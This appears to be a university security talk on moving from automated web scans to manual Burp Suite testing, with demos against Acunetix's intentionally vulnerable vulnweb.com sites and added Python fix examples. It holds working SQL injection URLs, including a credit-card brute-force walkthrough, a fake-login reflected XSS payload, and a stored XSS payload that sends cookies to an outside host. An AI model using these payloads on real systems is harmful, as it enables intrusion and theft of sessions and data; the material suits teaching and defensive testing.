Adding Value to Automated Web Scans Burp Suite and Beyond
Automated Scanning vs Manual Testing
Tools/Suites at MSU: QualysGuard WAS & Burp Suite
- Automated Scanning: identify attack surface across the organization
- Manual Testing: proxy tools used to verify scan results and find what automated scans miss
- Both are necessary in a large environment
Automated Scanning vs Manual Testing
Strengths of automated scanners:
- Scheduling
- Reporting
- Scalability
Strengths of manual scanners:
- Proxy based: allows interception of requests
- Customize payloads for vulnerability detection
- Verify findings from automated scan results
Automated Scanning vs Manual Testing
Weaknesses of automated scanners:
- Increased potential for false positives
- Duplicate findings
- Code coverage not as thorough
Weaknesses of manual scanning:
- Tester needs knowledge of the application for best results
- Learning curve (developers already stretched thin)
- Not scalable (e.g. distributing reports is very time consuming)
Methodology
Reconnaissance:
- Spider target
- Hidden files
- Google site search
- End result is a comprehensive map of the site
Discovery:
- Automated scanning
- Manual detection and analysis
Exploit:
- Automated exploit tools: sqlmap, havij, metasploit
- Burp Suite: hands-on testing
Road Map
- Spider and vulnerability scan already performed
- Leverage Burp tools to expand upon proofs of concept from scan results
- Carry out actual attack scenarios
Tools for this Demo
- Burp Suite
- Firefox
- FoxyProxy addon
- Firebug addon
Target: *.vulnweb.com (intentionally vulnerable websites from Acunetix)
Scan Results
- Vulnerability reports: the proof of concept (POC) includes the request payload and the application response
- POCs are not intuitive and are often met with doubt
- Need to be able to drive home the real risk
Scan Report - XSS example
Scan Report - SQLi Example
SQL Injection
Boolean Based SQLi (Blind SQL Injection)
Blind SQLi is possible if the application responds to true and false conditions in a detectable manner*
http://testphp.vulnweb.com/listproducts.php?artist=1 and 1=1 // true condition
http://testphp.vulnweb.com/listproducts.php?artist=1 and 1=2 // false condition
*Differences between true and false responses can be subtle. The Comparer tool highlights the differences between two responses.
Error Based SQLi
Possible if the application echoes database errors to the browser. The errors reveal information about the database that serves as clues for building an attack.
Demo - SQLi
A Better Blind SQLi Proof of Concept
http://testphp.vulnweb.com/listproducts.php?artist=1 and substring(@@version,1,1)=4 and 1=1 // false
http://testphp.vulnweb.com/listproducts.php?artist=1 and substring(@@version,1,1)=5 and 1=1 // true
SQLi Exploit Example
A Better Error Based SQLi POC
testphp.vulnweb.com/listproducts.php?artist=1' - error
vulnweb.com/listproducts.php?artist=1 union all select 1,2,3,4,5,6,7,8,9,10 - error
vulnweb.com/listproducts.php?artist=1 union all select 1,2,3,4,5,6,7,8,9,10,11 - no error!
vulnweb.com/listproducts.php?artist=1 union all select 1,2,3,4,5,6,7,8,9,10,11 from users - no error!
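An added example, not from the presentation or the vulnweb.com application, showing why the boolean-based checks above produce a detectable signal and how the fix removes it. The products table, the page rendering and the response_diff helper (a stand-in for what Burp's Comparer highlights) are all constructed assumptions.

```python
import difflib
import sqlite3

def make_db():
    # Constructed sample table standing in for the "listproducts.php?artist=" lookup.
    # Assumed schema; not the real application's database.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, artist INTEGER, name TEXT);
        INSERT INTO products VALUES (1, 1, 'Print A'), (2, 1, 'Print B'), (3, 2, 'Print C');
    """)
    return conn

def list_products_vulnerable(conn, artist):
    # The request parameter is spliced into the SQL text, so "1 and 1=2"
    # becomes part of the WHERE clause and changes the result set.
    sql = "SELECT name FROM products WHERE artist=" + artist
    return [row[0] for row in conn.execute(sql)]

def list_products_fixed(conn, artist):
    # Validate the type, then bind the value: the driver never parses it as SQL,
    # so a true and a false "condition" are both rejected identically.
    if not artist.isdigit():
        raise ValueError("artist must be a numeric id")
    rows = conn.execute("SELECT name FROM products WHERE artist=?", (int(artist),))
    return [row[0] for row in rows]

def render(products):
    # Minimal stand-in for the HTML page the server returns, one line per item.
    items = [f"<li>{p}</li>" for p in products]
    return "\n".join(["<html><body><h1>Products</h1><ul>", *items, "</ul></body></html>"])

def response_diff(resp_true, resp_false):
    # The lines that differ between the true-condition and false-condition
    # responses. An empty list means the application gives no detectable signal.
    return [line for line in difflib.ndiff(resp_true.splitlines(), resp_false.splitlines())
            if line.startswith(("+ ", "- "))]
```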
Cross Site Scripting
XSS type 0 - DOM Based: the attack string is embedded in the URL and not processed by the server. It is executed in the DOM client-side (very much like reflected).
XSS type 1 - Reflected: the attack string is submitted with the request (usually in the URL) and the server embeds the string in the HTML of the response.
*DOM based and reflected depend on social engineering to succeed
XSS type 2 - Persistent (stored) XSS: the application stores the attack string so that it is presented in future responses.
Reflected XSS Demo
Target: http://testasp.vulnweb.com/search.asp?msearch=
Goal: modify the page to look like a login
Payload:
/Search.asp?mSearch=<script>document.getElementsByClassName('framedform').item(0).innerHTML = "password <div><input type='password' id='pw' /><input type='button' onclick='alert(pw.value)' value='login' /></div>"; document.getElementsByClassName('path').item(0).innerHTML = '';</script>
*Requires social engineering. Obfuscate the query string to hide the script.
Same Origin Policy
Same Origin Policy (SOP) allows you to make requests to pages within the same site/domain, while preventing you from making requests to pages on a different domain. Without SOP the internet would be very unsafe: visit my evil site and I can direct your browser to attack any site I want.
The goal of an XSS attack is to subvert SOP to exfiltrate information.
Bypassing SOP
Image source: you are allowed to include images with a source outside of the application's domain
<img src='evildomain.com?id=' />
The src is an HTTP GET request.
Example XSS:
<div onmouseover='xssscript()'><img id='evil' src='evildomain.com?id=' size='1px' /></div>
<script>function xssscript(){..}</script>
Persistent XSS Demo
Target: http://testphp.vulnweb.com/guestbook.php
Goal: inject JavaScript and an image to bypass SOP
Objective is to send the cookie to my evil site: www.montana.edu/hardin/cookiejar.php?d={cookie}
Persistent XSS Demo
Payload:
Hello<div onmouseover='addsource()' style='width:100%'><img size='1px' id='badimg' /></div> there
<script>function addsource(){ document.getElementById("badimg").src = "http://www.montana.edu/hardin/cookiejar.php?d="+document.cookie; }</script>
SOP has been subverted!!!
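An added example, not from the presentation, showing the guestbook side of the persistent XSS demo above: the entry echoed raw beside the output-encoded version, checked with a parser the way a browser would read it, plus a response header set (an assumption, not the demo site's configuration) whose img-src directive blocks the cross-origin image GET that carries the cookie.

```python
import html
from html.parser import HTMLParser

# The guestbook entry from the demo above, stored verbatim (constructed test input).
PAYLOAD = """Hello<div onmouseover='addsource()' style='width:100%'><img size='1px' id='badimg' /></div> there<script>function addsource(){ document.getElementById("badimg").src = "http://www.montana.edu/hardin/cookiejar.php?d="+document.cookie; }</script>"""

def render_entry_vulnerable(entry):
    # Stored text is echoed into the page unchanged, so markup and script in the
    # entry become part of the DOM for every later visitor.
    return f"<p class='entry'>{entry}</p>"

def render_entry_fixed(entry):
    # Encode on output: <, >, &, and quotes become entities, so the browser shows
    # the payload as text and never parses a tag or event handler out of it.
    return f"<p class='entry'>{html.escape(entry, quote=True)}</p>"

def security_headers():
    # Assumed header set (not from the page). img-src 'self' stops the browser
    # from issuing the cross-origin image GET even if script does set src, and
    # HttpOnly keeps document.cookie from exposing the session cookie at all.
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; img-src 'self'",
        "Set-Cookie": "session=<value>; HttpOnly; Secure; SameSite=Lax",
    }

class TagCollector(HTMLParser):
    # Records every start tag and every inline on* handler attribute seen.
    def __init__(self):
        super().__init__()
        self.tags, self.handlers = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.startswith("on")]

def active_content(rendered):
    # Parse the rendered HTML as a browser would and report any tag beyond the
    # wrapping <p>, followed by any inline event handler attributes.
    collector = TagCollector()
    collector.feed(rendered)
    return [t for t in collector.tags if t != "p"] + collector.handlers
```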
Questions
hardin@montana.edu
SQLi Exploit Example
Goal: Use Intruder to brute force the value of the credit card field
1. Set proxy to intercept
2. Submit request in browser: http://testphp.vulnweb.com/artists.php?artist=1 and (select substring(cc,1,1)=1 from users limit 0,1)=1
3. Send intercepted request to Intruder tool
4. Indicate position(s) to be injected: http://testphp.vulnweb.com/artists.php?artist=1 and (select substring(cc,1,1)=1 from users limit 0,1)=1
5. Define the payloads
6. Start Attack